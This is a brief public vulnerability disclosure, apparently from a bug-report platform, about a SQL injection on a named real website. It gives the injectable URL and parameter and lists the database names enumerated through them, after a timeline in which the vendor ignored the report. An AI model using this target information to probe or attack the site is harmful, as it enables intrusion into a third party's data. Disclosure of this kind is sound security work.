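2015-07-04: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-08-18: The vendor has actively ignored the vulnerability; details are disclosed to the public.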
RT
Official site: http://www.guoli.com/
Injection URL:
http://www.guoli.com/renwen/index.php?&longterm=1&sp1=0
Parameter: longterm is injectable
Information:
current user: '[email protected]'
Databases:
current database: 'adushi'
available databases [8]:
[*] adushi
[*] dedev5
[*] discuz
[*] guoli
[*] guolicuser
[*] information_schema
[*] uch
[*] yanqing
Tables:
Database: adushi [148 tables]
As above.
Filter the input.
Unable to contact the vendor, or the vendor actively refused.